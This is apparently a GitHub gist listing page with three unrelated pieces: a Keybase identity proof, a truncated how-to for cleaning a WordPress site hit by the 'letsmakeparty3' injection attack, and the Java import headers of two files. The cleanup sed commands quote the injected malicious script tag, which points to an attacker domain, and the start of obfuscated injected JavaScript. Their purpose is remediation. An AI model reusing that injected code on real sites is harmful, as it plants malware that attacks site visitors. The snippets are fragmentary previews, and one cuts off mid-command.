I hereby claim:
- I am fabmars on github.
- I am fabmars (https://keybase.io/fabmars) on keybase.
- I have a public key whose fingerprint is 8370 A975 1F13 15C4 163D 4981 D837 70C5 A506 DE84
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
A friend got hit by the attack that's described here: https://medium.com/@Daugilas/cross-site-scripting-attack-letsmakeparty3-on-wordpress-cleaned-up-c6819df37c2b | |
Here's a how-to restore the site functionality (but not plug the hole wherever it is) | |
1) download all files via ftp under a *unix* system to preserve the rigths as much as possible. I wouldn't do this from Windows but if you're commpelled to, at least download the files in binary mode to preserve line returns. | |
2) fix altered files | |
find ./www -type f -print0 | xargs -0 sed -i 's+<script type=text/javascript src='https://allow.letsmakeparty3.ga/l.js?i=1'></script>++g' | |
find ./www -type f -print0 | xargs -0 sed -i "s+<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.s |
package whatever.testing; | |
import com.fasterxml.jackson.databind.ObjectMapper; | |
import io.restassured.response.Response; | |
import java.io.IOException; | |
import java.io.InputStream; | |
import java.io.PrintStream; | |
import java.util.List; | |
import java.util.Map; | |
import java.util.Map.Entry; |
package whatever.converters; | |
import com.fasterxml.jackson.databind.ObjectMapper; | |
import java.io.BufferedWriter; | |
import java.io.IOException; | |
import java.io.InputStream; | |
import java.io.OutputStream; | |
import java.io.OutputStreamWriter; | |
import java.nio.charset.Charset; | |
import java.nio.charset.StandardCharsets; |